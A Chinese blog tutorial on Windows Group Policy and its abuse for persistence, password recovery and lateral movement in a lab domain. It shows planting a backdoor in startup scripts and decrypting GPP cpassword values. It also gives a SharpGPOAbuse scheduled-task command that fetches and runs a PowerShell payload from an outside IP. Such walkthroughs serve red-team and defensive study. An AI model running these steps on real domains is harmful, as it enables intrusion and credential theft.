<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    組策略(GPO)利用與橫向移動

    一顆小胡椒2021-12-21 15:18:09

    組策略介紹

    組策略(英語:Group Policy)是微軟Windows NT家族操作系統的一個特性,它可以控制用戶帳戶和計算機帳戶的工作環境。組策略提供了操作系統、應用程序和活動目錄中用戶設置的集中化管理和配置。組策略的其中一個版本名為本地組策略(縮寫“LGPO”或“LocalGPO”),這可以在獨立且非域的計算機上管理組策略對象。

    通過使用組策略,你可以設置策略設置一次,然后將該設置復制到多臺計算機上。例如,你可以在鏈接到域的 GPO 中設置多個 Internet Explorer11 安全設置,然后將所有這些設置應用到域中的每臺計算機。

    組策略分類

    本地組策略

    本地組策略(Local Group Policy,縮寫LGP或LocalGPO)是組策略的基礎版本,它面向獨立且非域的計算機。至少Windows XP家庭版中它就已經存在,并且可以應用到域計算機。在Windows Vista以前,LGP可以強制施行組策略對象到單臺本地計算機,但不能將策略應用到用戶或組。從Windows Vista開始,LGP允許本地組策略管理單個用戶和組,并允許使用“GPO Packs”在獨立計算機之間備份、導入和導出組策略——組策略容器包含導入策略到目標計算機的所需文件。

    開始->運行->鍵入"gpedit.msc"->本地組策略編輯器->window設置(system)->腳本->啟動->屬性

    顯示文件:

    C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup
    

    把我們的后門程序復制到這個路徑,然后這個腳本開機就會自動加載執行了

    域組策略

    當機器安裝了域環境的時候,系統管理工具會多出一個功能(組策略管理),通過它,域管理員能夠很方便統一地對域內的機器和用戶進行統一管理。

    域管理員經常會面對一個這樣的問題,域成員機子的默認本地管理員密碼過于簡單,想進行批量修改的時候,這個時候就可以利用組策略來進行任務的批量下發。

    • 通過在域中下發腳本來執行
    • 在組策略首選項GPP中進行設置
    • 本地管理員密碼解決方案:LAPS(不細說這個內容,這是解決這個問題很好的方案)

    這里需要了解下AD域中兩個默認的共享文件夾:SYSVOL NETLOGON

    NETLOGON目錄

    掛載點:SYSVOL\domain\SCRIPTS 主要存放的是一些腳本信息,是AD活動目錄安裝時候自動創建的,是在sysvol下面的一個子目錄文件夾

    SYSVOL目錄

    SYSVOL目錄是AD域中的一個共享文件夾,該文件夾在AD活動目錄安裝時候被創建。通常用來存放組策略數據 和 一些腳本 配置文件,這些策略和腳本將用于傳遞給域成員機器。
    此外,域控機器之間因為要自動同步域數據,SYSVOL文檔允許該域內的所有DC機之間進行復制,并且所有的AD用戶都可以訪問它

    在域中,用戶登錄(計算機)時,會首先在SYSVOL文件查找GPO和啟動腳本。同時,為了保證系統的正常運行,必須為SYSVOL保留足夠的空間緩存,而且不能隨意刪除、改動該文件夾,要不然會出現一些組策略無法啟用等報錯信息

    該目錄由于針對的是域內所有機器和用戶,所以域內中的合法用戶均可以訪問和執行該目錄的文件。(普通的域用戶也可以)

    如果更改權限,這個地方會顯示拒絕訪問

    組策略鏈接

    Default Domain Policy為例,在右邊的作用域里面,可以看到它鏈接到demo.com整個域,也就是說在demo.com域內的所有計算機,用戶都會受到這條組策略的影響。鏈接的位置可以是站點、域以及OU。

    比如說xsf這條組策略。它就鏈接到xs這個OU。加入xs這個OU的所有計算機以及用戶會受到影響。

    組策略內容

    右鍵組策略,選擇保存報告,可以將組策略的內容導出為htlm。

    可以看到它配置的一些內容,設置密碼最長期限為42天,最短密碼長度為7個字符等。

    如果想配置這條組策略的內容,在組策略條目上右鍵編輯,打開組策略編輯器。可以看到左邊分為計算機配置以及用戶配置。在里面的配置分別作用于計算機和用戶。

    在配置底下又分為策略以及首選項。首選項是Windows Server 2008發布后用來對GPO中的組策略提供額外的功能。策略和首選項的不同之處就在于強制性。策略是受管理的、強制實施的。而組策略首選項則是不受管理的、非強制性的。

    對于很多系統設置來說,既可以通過策略設置來實現,也可以通過策略首選項來實現,二者有相當一部分的重疊。

    組策略更新

    默認情況下,客戶端更新組策略的方式主要有

    1. 后臺輪詢檢查sysvol里的GPT.ini,如果版本高于本地保存的組策略版本,客戶端將會更新本地的組策略。輪詢的時間是,默認情況下,計算機組策略會在后臺每隔90分鐘更新一次,并將時間作0到30分鐘的隨機調整。域控制器上的組策略會每隔5分鐘更新一次。
    2. 用戶開機登錄時,會檢查sysvol里的GPT.ini,如果高于本地保存的組策略版本,將會更新本地的組策略。
    3. 客戶端強制更新,執行gpupdate /force

    域控強制客戶端更新(不會比較域共享目錄中組策略的版本),執行Invoke-GPUpdate -Computer "TESTwin10" -Target "User"(2008 R2默認不支持該命令,2012支持)

    組策略應用順序:

    應用本地組策略 → 如果有站點組策略則應用 → 應用域策略 → 應用OU上的策略。

    如果同一個OU上鏈接了多個GPO,則按照鏈接順序從高到低逐個應用。如果多個組策略設置沖突,則后應用的組策略覆蓋先應用的組策略。

    組策略存儲

    每條組策略可以看做是存儲在域級別的一個虛擬對象,叫做GPO。每個GPO有唯一標志,用來標識每條組策略(或者說每個GPO),GPO在域內存儲分為兩個部分:GPC、GPT。

    GPC位于LDAP中,CN=Policies,CN=System,下,每個條目對應一個GPC。包含了GPO屬性,例如版本信息,GPO狀態和其他組件設置。

    GPT位于\\\SYSVOL\\Policies中。域內任何人都可以讀取\\\SYSVOL\\這個默認的共享路徑下的內容。

    GPC里面的gPCFileSysPath屬性鏈接到GPT里面。GPT是一個文件系統文件夾,其中包含由.adm文件,安全設置,腳本文件以及有關可用于安裝的應用程序的信息指定的策略數據。

    在域、站點、OU上的gPLink屬性來標識鏈接到這里的組策略,gPOptions屬性來標識組策略是否會繼承。

    組策略利用

    GPO常用命令

    #加載GroupPolicy模塊 (win7沒有,win10有)Import-Module GroupPolicy –verbose#獲得所有GPO的內容Get-GPO -All#將所有GPO導出為一個HTML報告Get-GPOReport -All -ReportType html -Path C:\GposReport\GposReport.html#將每個GPO單獨導出一個HTML報告Get-GPO -All | %{Get-GPOReport -name $_.displayname -ReportType html -path ("c:\GPOReports\"+$_.displayname+".html")}#查看指定GPO的權限設置Get-GPPermission -Name "客服部組策略" -All#備份指定GPOBackup-Gpo -Name TestGPO1 -Path C:\GpoBackups#備份所有GPOBackup-Gpo -All -Path "c:\GpoBackups"#還原指定GPORestore-GPO -Name TestGPO1 -Path C:\GpoBackups#還原所有GPORestore-GPO -All -Path "c:\GpoBackups"
    

    利用SYSVOL還原組策略中的密碼

    如果在組策略中輸入了密碼,如以用戶身份運行程序、修改域內主機內置administrator用戶密碼等操作。

    然后可以在GPT中看到加密后的密碼(AES-256)

    C:\Windows\SYSVOL\domain\Policies\{0EA52652-3A0D-4135-8BD7-92EFF59CB765}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
    

    1. 可以通過以下命令來快速搜索(網上有解密方法)
    findstr /S cpassword \\192.168.40.154\sysvol\*.xml
    for /r \\192.168.40.154/sysvol %i in (*.xml) do @echo %i
    

    1. 得到cpassword后可以通過kali中的gpp-decryp 去解密

    1. 利用Get-GPPPassword,自動查詢共享文件夾\SYSVOL中的文件,還原出所有明文密碼。

    組策略橫向

    在拿到域控之后,有時候可能網絡ACL到達不了目標電腦,可以通過組策略進行橫向。攻擊者可以利用組策略來推出惡意軟件、創建/修改計劃任務、降級憑據保護、向所有計算機添加新的本地帳戶被添加到本地管理員組。更改現有的安全策略,啟用明文密碼提取。

    實驗環境如下:

    域控:AD-2008(192.168.40.154),demo\administrator:vulnstack4.

    域機器:win7(192.168.40.157),demo\administrator:vulnstack4.

    目前已經拿下域控,域成員機開啟了防火墻,并且禁止了445,135等端口的訪問,傳統的psexec和winrm以及pth等橫向移動無法直接拿下成員機

    • 計劃任務

    自Windows Server 2008開始,GPO開始支持計劃任務,便于管理域中的計算機和用戶。

    指定用戶配置定時任務

    • 創建GPO
    powershell -c Import-Module GroupPolicy;new-gpo -name TestGP02
    

    • 將GPO鏈接到域demo.com,需要域管權限。
    powershell -c Import-Module GroupPolicy;new-gplink -name TestGP02 -Target "dc=demo,dc=com"
    

    • #添加定時任務 --TargetDnsName指定計算機
    execute-assembly F:\\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update2" --Author demo\\administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://119.45.175.218/payload.ps1'))\"" --GPOName "TestGP02" --FilterEnabled --TargetDnsName 192.168.40.148
    

    即時任務會在組策略同步的時候強制執行一次,組策略每90分鐘自動同步一次。

    • 在組成員中強制更新組策略,或者默認等待90分鐘等待組策略強制更新
    gpupdate /force
    

    這時候可以看到域成員機上線

    • 刪除gpo
    powershell -c Import-Module GroupPolicy;Remove-GPO -Name TestGPO2
    

    參考:

    https://xz.aliyun.com/t/9511

    https://www.anquanke.com/post/id/203151#h3-22

    組策略計算機用戶
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    組策略(GroupPolicy)是Microsoft Windows系統管理員為計算機和用戶定義的,用來控制應用程序、系統設置和管理模板的一種機制。
    Dcsync在域環境中,不同域控制器之間,每 15 分鐘都會有一次域數據的同步。如果需要同步的數據比較多,則會重復上述過程。
    組策略提供了操作系統、應用程序和活動目錄中用戶設置的集中化管理和配置。組策略的其中一個版本名為本地組策略,這可以在獨立且非域的計算機上管理組策略對象。
    vm單獨添加一個網卡用來進行域環境隔離。機器配置:windows
    Group3r 是一個供內網滲透測試人員和紅隊人員快速枚舉 AD 組策略中的相關設置并識別其中可利用的錯誤配
    十月,Microsoft發布了一個修補程序來糾正Windows組策略客戶端中的漏洞。出于性能目的,它將組策略的副本保留在本地緩存中。漏洞 如前所述,當發生組策略更新時,策略將在本地緩存。文件夾的所有者是Administrators組,并且該Users組僅具有從%programdata%\Microsoft文件夾繼承的讀取和執行權限。為此,低特權用戶應禁用繼承,然后向自己授予“完全控制”權限。一旦觸發了OpLock,我們將刪除連接點并釋放OpLock。由于DACL寫入僅部分起作用,并且刪除了聯結點,因此Full Control保留了權限。
    01 Bucket 公開訪問 騰訊云存儲桶的訪問權限默認為私有讀寫權限,且存儲桶名稱會帶上一串時間戳:
    如,僅在項目或部門內流轉,在丟失、被竊、外借的情況下,其中存儲的數據仍然只有指定的設備和人員才能訪問。以下進入“菜單”正式內容,請按順序食用。所以使用Bitlocker技術,密鑰備份是關鍵,這一點我會在后面的配置中再次強調。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类